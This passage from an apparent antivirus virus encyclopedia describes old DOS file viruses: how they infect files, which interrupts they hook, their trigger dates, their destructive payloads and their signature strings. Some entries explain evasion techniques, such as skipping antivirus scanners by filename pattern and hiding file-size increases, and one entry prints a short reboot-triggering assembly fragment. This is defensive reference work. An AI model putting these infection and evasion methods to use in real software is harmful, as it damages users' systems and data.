  30327. This virus will change the attributes of files opened or executed,
  30328. in addition to infecting them, once the virus is memory resident.
  30329.  
  30330. Upon loading, NO-17-800 will check if the system date is between
  30331. November 17 and November 30; if it is, the virus will save the
  30332. system time's hour of day and will always check it until it has
  30333. changed; this is when it will write 8 sectors starting at the 1st
  30334. sector of the default drive.  This will destroy the Boot Record and
  30335. files located in the first 8 sectors of floppy disks while it will
  30336. destroy the Boot Record and the File Allocation Tables of the hard
  30337. disk depending on the default drive of the system.
  30338.  
  30339. This string is found in the virus code:
  30340.  
  30341.        "SCAN.CLEAN.COMEXE"
  30342.  
  30343. [Nov_17th.855.A]
  30344. Alias: NOVEMBER 17-855
  30345. Origin:
  30346. Eff Length: 855
  30347. Virus Type: File Virus
  30348.  
  30349. Symptoms :
  30350. Will increase .COM and .EXE files by 855 bytes and will allocate
  30351. 896 bytes in the High Memory Area.
  30352.  
  30353. General Comments:
  30354. On the first infection, this virus checks if the file carrier is .EXE.
  30355. It will infect .COM and .EXE differently because of the difference in
  30356. the structure of the two. Then it allocates 896 bytes in the High
  30357. Memory Area and then moves its virus code to HMA. It then hooks INT 9
  30358. and INT 21, with points to services 3D (Open File Handle), 43
  30359. (Get/Set File Attributes) and 4B00 (Execute Child Process). After
  30360. this it returns control to the original routine.
  30361.  
  30362. This virus will change the attributes of files opened or executed,
  30363. in addition to infecting them, once the virus is memory resident.
  30364.  
  30365. This is a variant of the NO17-800 virus but the difference is that
  30366. this virus is triggered by the keys pressed and not by time as that of
  30367. NO17-800 virus.  When a certain number of keys are pressed and if the
  30368. system date is between November 17-30, this is when it will write
  30369. 8 sectors starting at the 1st sector of the default drive.  This will
  30370. destroy the Boot Record and files located in the first 8 sectors of
  30371. floppy disks while it will destroy the Boot Record and the File
  30372. Allocation Tables of the hard disk depending on the default drive
  30373. of the system.
  30374.  
  30375. This string is found in the virus code:
  30376.  
  30377.           "SCAN.CLEAN.COMEXE"
  30378.  
  30379. [No_Frills.Dudley]
  30380. Virus Status:
  30381. Origin:
  30382. Eff Length: 1215
  30383. Virus Type: File Virus; Encryption Virus
  30384.  
  30385. Symptoms :
  30386. Will increase .COM and .EXE files by 1215 bytes and will allocate
  30387. 4624 bytes in the High Memory Area.
  30388.  
  30389. General Comments:
  30390. On the first time it is loaded, NOFDUDLY will first decrypt 1153 bytes
  30391. of its code.  Then it will check if it is already loaded in the memory.
  30392. If it is not yet loaded then it will allocate 4624 bytes in the
  30393. High Memory Area.  Then it will transfer all of its 1215 bytes code
  30394. to the High Memory Area.  It will then hook INT 21, adding extra
  30395. codes to services 54 (Get Verify Flag), 4B00 (Execute Program),
  30396. 3D (Open File Handle), 56 (Rename File), and 6C (Extended Open/Create).
  30397. Then it will return control to the original routine.
  30398.  
  30399. When in memory, NOFDUDLY will temporarily hook INT 24 (Critical Error
  30400. Handler) so that it can readily troubleshoot problems if errors
  30401. occurred and then unhook it again.  Then it will infect the command
  30402. interpreter (COMMAND.COM) of the default drive.
  30403.  
  30404. This virus is an enhanced variant of the NOFRILLS virus with an
  30405. additional encryption enhancement to the older variant.
  30406.  
  30407. Text message found in the virus code:
  30408.  
  30409.             "[Oi Dudley] [PuKE]"
  30410.  
  30411. [No_Frills.843]
  30412. Alias: NO FRILLS
  30413. Origin:
  30414. Eff Length: 843
  30415. Virus Type: File Virus
  30416.  
  30417. Symptoms :
  30418. Will increase .COM and .EXE files by 843 bytes and will allocate
  30419. 1536 bytes in the High Memory Area.
  30420.  
  30421. General Comments:
  30422. This virus will first check if the carrier file is .COM or .EXE. It
  30423. will do so to know which code will be transferred to the High
  30424. Memory Area.  It will then allocate 1536 bytes of High Memory Area
  30425. and transfer 400h of its virus code to it.  It will then hook INT 21
  30426. adding extra codes to services 54 (Get Verify Flag), 4B00 (Execute
  30427. Program), 3D (Open File Handle), 43 (Get/Set File Attributes), and 6C
  30428. (Extended Open/Create). Then it will return control to the original
  30429. routine.
  30430.  
  30431. When in memory, NOFRILLS will temporarily hook INT 24 (Critical Error
  30432. Handler) so that it can readily troubleshoot problems if errors
  30433. occurred and then unhook it again.  Then it will infect the command
  30434. interpreter (COMMAND.COM) of the default drive.
  30435.  
  30436. This message is found in the virus code:
  30437.  
  30438.          "+-No Frills 2.0 by Harry McBungus-+"
  30439.  
  30440. [Nomenklatura]
  30441. Virus Status:
  30442. Origin:
  30443. Eff Length: 1024 bytes
  30444. Virus Type:
  30445.  
  30446. Symptoms :
  30447. Increase of 1024 bytes in sizes of EXE and COM files and decrease of
  30448. 1072 in the available memory.  Usually displays disk
  30449. read/write errors like "Sector not found", "Invalid Media Type" and
  30450. other disk related errors.
  30451.  
  30452. General Comments:
  30453. The NOMENKLATURA virus is almost similar to common viruses to date.
  30454. The difference is that it uses INT 2F service 13 (Set Disk Interrupt
  30455. Handler) which is more like an error-trapping procedure for the virus
  30456. when infection of other files is impossible.  It is common to other
  30457. viruses because it will first allocate in the High Memory Area with a
  30458. size of 1072 bytes and then transfer 1055 bytes of it to the high
  30459. memory. The extra bytes loaded by the virus are the addresses of
  30460. specific locations in the Operating System in the memory so it can
  30461. directly access it and also the interrupt vectors of INT 21 and INT 13.
  30462. It also has checking procedures if an executed file is infected or not,
  30463. if it is COM or EXE.  Executable files that are opened and/or executed
  30464. will be infected immediately by this virus.
  30465.  
  30466. This virus was named as such because of the text string found in the
  30467. virus code : "NOMENKLATURA"
  30468.  
  30469. [Cordobes.3334]
  30470. Virus Type:  Polymorphic, File Virus
  30471. Virus Length: 3,333 bytes
  30472. Virus Infect Type: .EXE files
  30473. Virus Re-infect: no
  30474. Virus Memory Type: Memory resident, MCB type
  30475. Place of Origin:
  30476.  
  30477. PC Vectors Hooked: INT 21h
  30478.  
  30479. Infection Procedure:
  30480. The virus only infects .EXE files. The virus infects the host file by
  30481. attaching itself at the end of the file. As a polymorphic virus, it
  30482. first decrypts its code. The virus has a complicated way of decrypting
  30483. its code. The virus allocates 4,128 bytes in the low memory starting
  30484. at 1806:0000 and copies its 3,333 bytes program there to stay resident.
  30485. From there it hooks INT 21H by pointing its vector to its program in
  30486. the low memory at 1816:0BAB. It uses this interrupt to attach itself
  30487. to the loading and executing .EXE files. Once activated by loading and
  30488. executing infected files the virus checks for the current month and
  30489. day. If it is August 10 the virus infects files. Aside from infecting
  30490. .EXE files, it will also search for AUTOEXEC.BAT in drive C:\ and
  30491. append the following:
  30492.  
  30493.         @Echo Virus "EL MOSTRO CORDOBES"
  30494.         @Echo No tema por sus datos. Que pase un buen
  30495.         @Echo.
  30496.         @Pause
  30497.  
  30498. Thus, upon system bootup in drive C:\ the text string above will be
  30499. displayed and will pause until a key is pressed. The same string can
  30500. be seen inside the viral code. Sometimes the virus cannot attach to
  30501. .EXE files completely so the increase in the size of the host file
  30502. after infection is indefinite, and cannot become memory resident.
  30503. The corrupted files will not finish loading and will display "Error
  30504. in EXE file."
  30505.  
  30506. Damage: Corrupts .EXE files.
  30507.  
  30508. Symptom: Will add the above text to the AUTOEXEC.BAT file in drive C:\.
  30509.  
  30510. [Jos]
  30511. Virus Type: File Virus
  30512. Virus Length:
  30513. Virus Infect Type: MBR
  30514. Place of Origin:
  30515. Virus Memory Type:
  30516.  
  30517. PC Vectors Hooked:
  30518.  
  30519. Infection Procedure:
  30520. 1) Moves 21CDh in DS:[FE], 14EBh in DS:[100] and 17h in DS:[11E].
  30521. 2) Loads/executes a program having the control block = 114C:11E and
  30522.    ASCIIZ command line = 114C:0. This procedure is unsuccessful.
  30523. 3) Writes character in teletype mode having 1Eh as the graphics mode,
  30524.    page 1. Displaying :
  30525.  
  30526.          "Beware the Jabberwock, my son!"
  30527.          "The jaws that bite, the claw that catch!"
  30528.  
  30529.          "And hast thou slain the Jabberwock!"
  30530.          "Come to my arms, my beamish boy!"
  30531.  
  30532. 4) Loops with FFFFh as the value of CX (just a delay).
  30533. 5) Executes these codes:
  30534.  
  30535.             MOV GS,DX
  30536.             CLI
  30537.             CLD
  30538.             IN AL,64
  30539.             TEST AL,04
  30540.             JNZ D840
  30541.     D840:   SMSW AX
  30542.             TEST AL,01
  30543.             JZ D84F
  30544.             CLI
  30545.             MOV AL,FE
  30546.             OUT 64,AL
  30547.  
  30548. After performing these codes the machine performs a warm boot.
  30549.  
  30550. Symptom: A message can be seen in address = 114C:0239h
  30551.  
  30552.        "JABBERW OCKY (.) the first Romanian
  30553.            Political Virussian
  30554.            Dhohoho$
  30555.            Released Date 12-22-1990"
  30556.  
  30557. [Npox.963.A]
  30558. Alias: EVIL GENIUS 2.0
  30559. Origin:
  30560. Eff Length: 963 bytes
  30561. Virus Type:
  30562.  
  30563. Symptoms :
  30564. Increase of 963 bytes in sizes of EXE and COM files and decrease
  30565. of 1024 in the available memory.  When in a write-protected floppy,
  30566. it usually displays a "Write Protect Error" message when you try to
  30567. read from it.
  30568.  
  30569. General Comments:
  30570. On the first infection, this virus allocates 1024 bytes in the High
  30571. Memory Area and then transfers its code to the HMA. After that, it
  30572. hooks INT 21 and INT 9 and then returns control back to the original
  30573. routine.
  30574.  
  30575. This text string can be found in the virus code:
  30576.  
  30577.          "Evil Genius V2.0 - RS/NuKE"
  30578.          "C:\COMMAND.COM"
  30579.  
  30580. It will infect COM and EXE files that are loaded, executed or opened
  30581. by other files.  During infection, the file's time and date will not be
  30582. modified except for the seconds count which will be set to :58. This
  30583. is also the virus' signature if a file is already infected.  But
  30584. before infecting files, it checks whether the file is executed by
  30585. another program (i.e., debuggers, anti-virus).  If it is being executed
  30586. by another file then it will check if the file loader has the following:
  30587.  
  30588.       1.)  ****prot.***   (i.e. f-prot, nprot, lprot)
  30589.       2.)  ****scan.***   (i.e. pcscan, scan, viruscan)
  30590.       3.)  ****lean.***   (i.e. clean)
  30591.  
  30592. If the above characteristics are not satisfied then it will infect the
  30593. executed program.
  30594.  
  30595. Once resident, the N-Pox virus will hide the increase in the size of
  30596. infected programs when the user tries to view it (i.e., DIR).  It will
  30597. also modify loaded infected files in the memory so as to hide them from
  30598. anti-virus software.
  30599.  
  30600. The damage that N-Pox does is that if the system date is the 24th of
  30601. any month and if a key is pressed, it will format the first 32 tracks
  30602. of the hard disk, starting from track 0. This will damage the Boot
  30603. Record, File Allocation Tables (FAT) and the system files on the hard
  30604. disk.
  30605.  
  30606. [Cpw.1527]
  30607. Virus Type: Polymorphic, File Virus
  30608. Virus Length: 1,527 bytes
  30609. Virus Infect Type: .EXE and .COM file
  30610. Virus Re-infect: No
  30611. Discovery Date: 1992
  30612. Virus Memory Type: High memory resident
  30613. Place of Origin: Chile
  30614.  
  30615. PC Vectors Hooked: INT 21h
  30616.  
  30617. Infection Procedure:
  30618. The virus infects both .EXE and .COM files. It infects its host file by
  30619. attaching itself at the end of the file. It increases an infected file's
  30620. size by 1,527 bytes. The virus can become memory resident upon loading
  30621. and executing an infected file. As a polymorphic virus it first decrypts
  30622. its code. Then it allocates 1,984 bytes in the high memory starting at
  30623. 9F84:0000. It hooks INT 21H by pointing its vector to its program in the
  30624. high memory at 9F84:0258 to be able to attach itself to loading .EXE and
  30625. .COM files upon opening it. Before infecting a loading executable file,
  30626. it first deletes CHKLIST.CPS, which is an anti-virus file, if it exists.
  30627. Then it infects COMMAND.COM in drive C:\ by attaching itself to the
  30628. file. After infecting C:\COMMAND.COM, it finally infects the loading
  30629. executable  file. During infection, the virus checks for the current
  30630. month, day, and hour. If the current date is September 11 or December
  30631. 28 then it checks for the current hour. The following hour of the day
  30632. will trigger the payload:
  30633.  
  30634.                 0th hour.......(12:00 am)
  30635.                 1st hour.......(1:00 am)
  30636.                 4th hour.......(4:00 am)
  30637.                 6th hour.......(6:00 am)
  30638.                 7th hour.......(7:00 am)
  30639.                 10th hour.......(10:00 am)
  30640.                 11th hour.......(11:00 am)
  30641.                 13th hour.......(1:00 pm)
  30642.                 16th hour.......(4:00 pm)
  30643.                 18th hour.......(6:00 pm)
  30644.                 19th hour.......(7:00 pm)
  30645.                 21st hour.......(9:00 pm)
  30646.  
  30647. The payload deletes the first file entry in the current directory until
  30648. it deletes the currently loaded file. Even though the currently loaded
  30649. file that activated the virus was deleted, the virus still remains
  30650. memory resident, and will continue its payload. The deletion occurs
  30651. every time an executable file is loaded, given that the virus is
  30652. already memory resident. Not all .COM files are infected by the virus.
  30653. Only those that have large file sizes will be infected. As checked from
  30654. DOS CHKDSK the virus occupies 1,792 bytes in the memory or decreases
  30655. the available memory by that size. The following text strings can be
  30656. seen within the virus code:
  30657.  
  30658.         "CPW fue becho en Chile en 1992,"
  30659.         "VIVA CHILE MIERDA!"
  30660.  
  30661. [DR&ET]
  30662. Virus Type:  Polymorphic, File Virus
  30663. Virus Length: 1,710-1,713 bytes
  30664. Virus Infect Type: .COM and .EXE files
  30665. Virus Re-infect: No
  30666. Virus Memory Type: High memory resident
  30667. Place of Origin:
  30668.  
  30669. PC Vectors Hooked: INT 21h
  30670.  
  30671. Infection Procedure:
  30672. The virus infects .COM and .EXE files. It increases an infected file's
  30673. size by 1,710 bytes for .COM file and 1,713 bytes for .EXE file. The
  30674. virus infects the host file by attaching itself at the end of the file.
  30675. The virus can become memory resident upon loading and executing an
  30676. infected file. When memory resident the virus can infect executable
  30677. files when it is opened. The virus uses complex method of decryption.
  30678. After decryption the virus allocates 1,776 bytes in the high memory
  30679. and copies its program there to stay resident. Then it hooks INT 21H
  30680. by changing its vector to point to its program in the high memory at
  30681. 9F92:017A. It uses this interrupt to attach itself to the host file.
  30682. Before attaching to the host file, the virus encrypts its code again
  30683. and then writes itself to the host file.
  30684.  
  30685. During infection, the virus checks for the current day. If it is the
  30686. 13th day of the month it checks for another condition by decrypting
  30687. and comparing data from its data area whose condition is possibly
  30688. known only to the author of the virus. If the 2 conditions are
  30689. satisfied it will execute the payload of overwriting the Master Boot
  30690. Sector of drive C:\ with its own program and replacing the original
  30691. Interrupt Vector Table with its own table. As a result the system
  30692. will hang up during bootup. The date and time attributes of the
  30693. host file after infection are not changed.
  30694.  
  30695. Damage: Corrupts the Master Boot Sector and Interrupt Vector Table.
  30696.  
  30697. Symptom:
  30698. 1) Hangs the system during bootup.
  30699. 2) Increases the file size by 1,710 for .COM files and 1,713 for .EXE
  30700.    files.
  30701.  
  30702. [Trakia.1070]
  30703. Virus Type: File Virus
  30704. Virus Length: Approximately 1076-1084 bytes
  30705. Virus Infect Type: Mutation Virus
  30706. Virus Memory Type: High Memory
  30707. Place of Origin:
  30708.  
  30709. PC Vectors Hooked: Int 21h
  30710.  
  30711. Infection Procedure:
  30712. 1) Loads itself onto the high memory, allocating 1360 bytes (9FAB:0000).
  30713. 2) Moves 1357 (054DH) bytes to the high memory.
  30714. 3) Infects *.COM and *.EXE files. Copies the virus code to the host
  30715.    program, adding approximately 1076 - 1084 bytes. Loads the virus
  30716.    first before running the host program.
  30717.  
  30718. This virus is a mutation virus. When an infected file is executed, it
  30719. will search for *.COM and *.EXE files using Int 21 (4E and 4F), and
  30720. will infect when DTA is set. It only infects files within the current
  30721. directory.
  30722.  
  30723. Damage:
  30724. 1) Free memory decreases.
  30725. 2) Increase in file size. Adds approximately 1076-1084 bytes.
  30726.  
  30727. Symptom: Delay in program execution due to file search.
  30728.  
  30729. Text string: "Files Only (No symbols) .SYM - Load symbol file only.
  30730. No extension - Load program & symbols" appears within the virus code.
  30731.  
  30732. [Predator.2448]
  30733. Virus Status:
  30734. Origin:
  30735. Eff Length: 2448 bytes
  30736. Virus Type: Polymorphic Virus
  30737.  
  30738. Symptoms :
  30739. Increase of 2448 bytes in sizes of EXE and COM files and decrease
  30740. of 6144 bytes in the available memory.
  30741.  
  30742. General Comments:
  30743. This virus is a variant of the PREDATOR-1072 virus.  It will infect
  30744. all EXE and COM files that are executed, opened or copied.  It is
  30745. also memory resident which resides in the High Memory Area.
  30746.  
  30747. During the first infection, it decrypts 2424 bytes of its code and then
  30748. allocates 6144 bytes in the High Memory Area and transfers its code
  30749. there. It also hooks INT 13 and 21.
  30750.  
  30751. This message is found in the encrypted virus code:
  30752.  
  30753.       "Predator Virus #2 (c) 1993 Priest - Phalcon/Skism"
  30754.  
  30755. [Freddy.2.1]
  30756. Virus Type: File Virus
  30757. Other Name:
  30758. Virus Length:
  30759. Place of Origin:
  30760.  
  30761. PC Vectors Hooked: Int 21h
  30762.  
  30763. Infection Procedure:
  30764. 1) Encrypts data to 11D2:0059h to 937h reading:
  30765.    "COMMAND.COM     *.COM    *.EXE       Freddy KRueGer 2.1
  30766.    Hi Fridrik!", thus copying data from 11D2:0059 to 114D:0 to
  30767.    13FFh, hooking interrupt 21.
  30768. 2) Infects COMMAND.COM, COM and EXE files.
  30769.  
  30770. When the virus is loaded it hangs because it searches for the host
  30771. to infect it. Infecting the host, it destroys the file.
  30772.  
  30773. [Tremor-1]
  30774. Virus Type: File Virus
  30775. Virus Length:
  30776. Virus Memory Type: High Memory
  30777. Place of Origin:
  30778. Trigger Condition: Checks if the date is above April 13, or if the
  30779.                    year is above or equal to 1993. If so it executes
  30780.                    the virus code directly.
  30781.  
  30782. PC Vectors Hooked: Int 21h, Int 15h, Int 2Fh
  30783.  
  30784. Infection Procedure:
  30785. 1) Loads itself onto the high memory, allocating approximately
  30786.    4272-4288 bytes.
  30787. 2) Infects *.EXE files. Copies the virus code to the host program,
  30788.    adding approximately 4003 bytes. Loads the virus first before
  30789.    running the host program.
  30790. 3) While memory resident, the virus infects all opened EXE files.
  30791.  
  30792. The virus checks for the system date and time, after the virus code is
  30793. decrypted. The code then checks for the DOS version with reason unknown.
  30794. It continues by getting the process ID of the program, to enable itself
  30795. to set the kind of allocation strategy it wants to do, Int 21 (58).
  30796. After this, the virus checks for the extended memory, Int 21 (43). If
  30797. all needed requirements are set, it begins to modify the memory
  30798. allocation, Int 21 (4A). The virus code is then transferred to the
  30799. high memory, at a size approximately 4003 bytes. When in memory, the
  30800. virus sets the DTA to which it will copy its code.
  30801.  
  30802. Symptom:
  30803. Displays: "-=> T.R.E.M.O.R was done by NEUROBASHER
  30804.              /May-June '92, Germany <=-
  30805.           -MOMENT-OF-TERROR-IS-THE-BEGINNING-OF-LIFE-"
  30806.  
  30807. Infected files run normally. Increase in file size, and occupies
  30808. memory space.
  30809.  
  30810. Detection method: Decrypt the virus code before detection.
  30811.  
  30812. [Troj.1463]
  30813. Virus Type:
  30814. Virus Length: Approximately 1463 bytes
  30815. Virus Memory Type: High Memory
  30816. Place of Origin:
  30817.  
  30818. PC Vectors Hooked: Int 21h
  30819.  
  30820. Infection Procedure:
  30821. 1) Loads itself onto the high memory after decryption, allocating
  30822.    3536 bytes (9F23:0100).
  30823. 2) Moves 1463 (05B7H) bytes to the high memory.
  30824.  
  30825. Does not actually infect files, what it does is load itself resident
  30826. in the high memory and mess up the execution of files. (see Damage
  30827. below)
  30828.  
  30829. Damage: When an infected file is executed while the virus is memory
  30830. resident, two payloads can be detected.
  30831.  
  30832. 1. COM files:
  30833.    When *.COM files are executed while the virus is memory resident,
  30834.    those files will not run.
  30835.  
  30836. 2. EXE files:
  30837.    When *.EXE files are executed while the virus is memory resident,
  30838.    those files will not run, like COM files. But this will only
  30839.    happen once. The second execution of an EXE file will result to
  30840.    a same display, but this time the COMMAND.COM becomes invalid.
  30841.    System becomes useless afterwards.
  30842.  
  30843. Note: Executing a COM file will not suspend itself. But when an EXE
  30844. file is executed after a COM file has been executed, the system will
  30845. then suspend.
  30846.  
  30847. Symptom:
  30848. Text string: "Trojector II, (c) Armagedon Utilities, Athens 1992"
  30849. appears within the decrypted code.
  30850.  
  30851. [Troj.1561]
  30852. Virus Type:
  30853. Virus Length: Approximately 1561 bytes
  30854. Virus Memory Type: High Memory
  30855. Place of Origin:
  30856.  
  30857. PC Vectors Hooked: Int 21h
  30858.  
  30859. Infection Procedure:
  30860. 1) Loads itself onto the high memory after decryption, allocating
  30861.    3744 bytes (9F16:0100).
  30862. 2) Moves 1561 (0619H) bytes to the high memory.
  30863.  
  30864. Does not actually infect any files, but the file executed will not run.
  30865.  
  30866. Damage: While the virus is memory resident, files executed will not run.
  30867.  
  30868. Symptom:
  30869. Text string: "Trojector ]I[, (c) Armagedon Utilities, Athe@"
  30870. appears within the decrypted code.
  30871.  
  30872. [Istanbul-2]
  30873. Virus Type: File Virus
  30874. Virus Length:
  30875. Virus Reinfect Type: doesn't reinfect
  30876. Place of Origin:
  30877. Virus Memory Type: MCB Type
  30878.  
  30879. PC Vectors Hooked: Int 21h
  30880.  
  30881. Infection Procedure:
  30882. 1) Gets the kernel of the host which is COMMAND.COM.
  30883. 2) Finds where the carrier of the virus is.
  30884. 3) Changes the attributes of the carrier.
  30885. 4) Opens the file.
  30886. 5) Returns 5h as the file handle.
  30887. 6) Moves the file pointer, then closes the file handle.
  30888. 7) Sets the file attributes of the carrier and forces a duplicate
  30889.    handle which is not successful.
  30890. 8) Displays the strings: "This file is infected with a virus!
  30891.    Preinfection file size = 10,000".
  30892.  
  30893. [Quicky]
  30894. Virus Status:
  30895. Origin:
  30896. Eff Length: 1376 bytes
  30897. Virus Type: Polymorphic Virus
  30898.  
  30899. Symptoms :
  30900. Increase of 1376 bytes in size of EXE files and decrease of 1760
  30901. bytes in the available memory.
  30902.  
  30903. General Comments:
  30904. Quicky will infect all EXE files that are executed, opened or copied.
  30905. Infected files will have an increase of 1376 bytes in their sizes.
  30906. It is also Memory Resident which resides in the MCB Chain.
  30907.  
  30908. On the first infection, it will decrypt 1275 bytes of its code and then
  30909. will allocate 1760 bytes. It will also hook INT 13 and 21.  After
  30910. doing this, it will run the host program and after executing
  30911. it, it will Terminate and Stay Resident in the MCB Chain.
  30912.  
  30913. This virus may interfere with some anti-virus programs as it also
  30914. contains text string pertaining to some anti-virus overlay files.
  30915.  
  30916. This text is found in the virus code:
  30917.  
  30918.          "Quicky"
  30919.  
  30920. [June12]
  30921. Virus Type: File Virus
  30922. Other Name:
  30923. Virus Length:
  30924. Virus Infect Type: EXE and COM files
  30925. Trigger Condition: June 12
  30926. Place of Origin:
  30927. Virus Memory Type: MCB Type
  30928.  
  30929. PC Vectors Hooked: Int 21h
  30930.  
  30931. Infection Procedure:
  30932. The virus is a TSR program. After the virus is executed
  30933. it immediately loads itself into the memory, where it waits
  30934. for an EXE and/or COM files to infect except COMMAND.COM.
  30935. It adds approximately 2660 bytes or more.
  30936. The infected file, when executed, runs normally.
  30937. But a special date, June 12 of any year, displays a message
  30938. and plays a tune (i.e., tune of the Philippine National Anthem).
  30939. After playing the tune the system resumes normal operation.
  30940. When infecting on June 12, the same message will be seen
  30941. and same tune can be heard.
  30942.  
  30943. Damage: When infecting a file and/or executing an infected file
  30944. this message can be seen:
  30945.  
  30946.    "June 12 - the Independence Day of the Philippines"
  30947.  
  30948. The Philippine flag can be seen here with the official color
  30949.  
  30950.    "MABUHAY ANG PILIPINAS"
  30951.    "Dedicated to Manong Eddie"
  30952.  
  30953. At the same time the Philippine National Anthem can be heard.
  30954.  
  30955. The tune can't be stop even pressing Ctrl+Break or Ctrl+C.
  30956.  
  30957. Note: The virus makes a smart move by hooking Int 1 and 3 to fool
  30958. the one debugging it.
  30959.  
  30960. [Junkie.A]
  30961. Virus Type: File Virus
  30962. Other Name:
  30963. Virus Length:
  30964. Virus Infect Type: COM files (including COMMAND.COM)
  30965. Trigger Condition:
  30966. Place of Origin:
  30967.  
  30968. PC Vectors Hooked: Int 21h, Int 1Ch
  30969.  
  30970. Infection Procedure:
  30971. 1) Encrypts the data from address 114C:[2CCF] to 114C:[30B6]
  30972.    by XORing it to D818h, forming a message:
  30973.  
  30974.       "Dr White - Sweden 1994"
  30975.       "VS"
  30976.       "Junkie Virus - Written in Malmo M01D"
  30977.  
  30978. 2) Hooks interrupt 1Ch and 21h and infects the
  30979.    master boot record, reading one sector in drive C.
  30980.    When the infected file is executed, the virus first infects
  30981.    COMMAN.COM. After rebooting the system, the virus infects
  30982.    COM files. A virus message can be seen at the end
  30983.    of the file. Approximately 1030 bytes are added to infected
  30984.    files.
  30985.  
  30986. Note: Diskettes accessed in an infected system will automatically
  30987. get infected.
  30988.  
  30989. [Burglar.1150]
  30990. Virus Name: BURG1150
  30991. Virus Type: File Virus
  30992. Virus Length: 1,150 bytes
  30993. Virus Infect Type: .EXE files
  30994. Trigger Condition: 14th minute
  30995. Virus Re-infect: No
  30996. Virus Memory Type: High Memory Resident
  30997. Place of Origin:
  30998.  
  30999. PC Vectors Hooked: INT 21h, INT 22h,
  31000.                    INT 23h, INT 24h
  31001.  
  31002. Infection Procedure:
  31003. The virus only infects .EXE files. It adds 1,150 byte to an infected
  31004. file. It encrypts the host's SS, SP, IP, and CS registers in its
  31005. header and saves it somewhere in the virus program so that it will
  31006. be difficult for anti-virus programs to clean them. It copies its
  31007. program in the high memory at 9FAA:0000. Then it hooks to interrupt
  31008. 21H by pointing it to its program in the high memory at 9FAA:0058
  31009. to be able to infect loading and executing .EXE programs.
  31010.  
  31011. During infection it checks the current time. If it is the 14th minute
  31012. of the hour, it dumps the string "Burglar/H" to the textmode screen
  31013. (B800:0000) with blinking attribute. There are other text strings
  31014. that can be seen inside the viral code which is "AT THE GRAVE OF
  31015. GRANDMA". It also hooks to Ctrl C handler INT 23H and points it to
  31016. 9FAA:016D. Upon pressing Ctrl C, it tries to infect COMMAND.COM in
  31017. the current drive. It also hooks to the critical error handler INT
  31018. 24 in order to hide the file infection whenever there's a virus write
  31019. error to the host (if the disk is write protected).
  31020.  
  31021. Symptom: Infected files increase by 1,159 bytes.
  31022.  
  31023. [Xuxa.1984.C]
  31024. Other Name: XUXA1984
  31025. Virus Type: File Virus
  31026. Virus Length: Approximately 1984 bytes
  31027. Virus Memory Type: High Memory
  31028. Place of Origin:
  31029.  
  31030. PC Vectors Hooked: Int 21h
  31031.  
  31032. Infection Procedure:
  31033. 1) Loads itself onto the high memory, allocating 4016 bytes (using
  31034.    MEM.EXE).
  31035. 2) Infects executed *.COM and *.EXE files. It adds 1984 bytes to the
  31036.    host program but if the virus is memory resident, the file
  31037.    increase is not seen when the DIR command is used. The virus
  31038.    subtracts 1984 bytes to the displayed file size.
  31039.  
  31040. The virus does not do anything special. It only replicates when a file
  31041. is executed while the virus is memory resident. Any file executed
  31042. afterwards will be infected.
  31043.  
  31044. Damage:
  31045. 1) Free high memory space decreases by approximately 4016 bytes.
  31046. 2) Infected files increase by 1984 bytes.
  31047.  
  31048. Symptom: Delay in program execution.
  31049.  
  31050. [SVC-1-S]
  31051. Virus Type: File Virus
  31052. Virus Length: Approximately 3103 bytes
  31053. Virus Memory Type: High Memory
  31054. Place of Origin:
  31055.  
  31056. PC Vectors Hooked: Int 21h
  31057.  
  31058. Infection Procedure:
  31059. 1) Loads itself onto the high memory, allocating 3120 bytes (using MEM).
  31060. 2) Moves 3104 (0C20H) bytes to the high memory.
  31061. 3) Infects *.COM and *.EXE files. Copies the virus code to the host
  31062.    program, adding approximately 3103 bytes. Loads the virus first
  31063.    before running the host program.
  31064.  
  31065. While memory resident, the virus infects any executed *.COM and
  31066. *.EXE files. It does not do anything special. It just replicates when
  31067. it is memory resident. Only infects executed files.
  31068.  
  31069. While the virus is resident in the memory, increase in the size of
  31070. infected files will not be visible.
  31071.  
  31072. Damage:
  31073. 1) Free memory decreases by approximately 3120 bytes.
  31074. 2) Increase in file size. Adds approximately 3103 bytes.
  31075.  
  31076. Symptom: Delay in program execution due to virus activity.
  31077.  
  31078. Text string: "(c) 1990 by SVC, Vers. 5.0"
  31079. appears within the virus code.
  31080.  
  31081. Detection method: Check for the above text string.
  31082.  
  31083. [Avispa]
  31084. Virus Name: AVISPA-D
  31085. Virus Type: Polymorphic type
  31086. Virus Length: 2051 bytes
  31087. Virus Infect Type: .EXE files
  31088. Virus Re-infect: No
  31089. Virus Memory Type: Memory Resident, MCB type
  31090. Place of Origin:
  31091.  
  31092. PC Vectors Hooked: INT 21h
  31093.  
  31094. Infection Procedure:
  31095. The virus infects .EXE files. It infects the host file by attaching its
  31096. program at the end of the file. It adds 2051 bytes to the infected file.
  31097. Since the virus is polymorphic, its encrypted program is decrypted
  31098. using XOR E491H to each byte. You can see after decrypting the data
  31099. area of the virus program a string "Virus Avispa-Buenos Aires-Noviembre
  31100. 1993".
  31101.  
  31102. After decryption it allocates 2304 bytes (144 paragraphs) of memory
  31103. after the resident part of COMMAND.COM to make itself resident. Then
  31104. it hooks to INT 21H by changing its vector to point to its program at
  31105. 17F8:030A, and infects other loading and executing .EXE programs.
  31106. It attempts to open and infect files XCOPY.EXE, MEM.EXE, SETVER.EXE,
  31107. and EMM386.EXE in C:\DOS\, if they exist.
  31108.  
  31109. Symptom: Increase in .EXE file size by 2051 bytes.
  31110.  
  31111. [Byway]
  31112. Virus Name: BYWAY-A
  31113. Virus Type: Polymorphic type
  31114. Virus Length: 3,216 bytes
  31115. Virus Infect Type: .COM, .EXE files, MBR
  31116. Virus Re-infect: No
  31117. Virus Memory Type: Memory resident, MCB type
  31118. Place of Origin:
  31119.  
  31120. PC Vectors Hooked: INT 21h
  31121.  
  31122. Infection Procedure:
  31123. The virus is an encrypting type and can infect both .COM and .EXE files.
  31124. It corrupts the Master Boot Sector. It hooks INT 21H such that it cannot
  31125. be seen in the interrupt vector table, but hooks to their routines
  31126. directly. It infects the host by corrupting the file and sometimes
  31127. overwriting its viral code to the host and erasing the host's program.
  31128. It allocates its program in the low memory with the DOS resident
  31129. programs. Once resident it infects a file when it is loaded, executed
  31130. or copied. Most of the time an infected file will not display the change
  31131. in its size, time and date attributes once it is infected. Once infected
  31132. the files cannot be overwritten by its own or other programs, and cannot
  31133. be deleted directly unless the subdirectory where it is located is
  31134. deleted. Encrypted trigger dates were seen but the payload is unknown.
  31135. The following are the trigger dates:
  31136.  
  31137.             JAN 4      JUL 16
  31138.             FEB 6      AUG 18
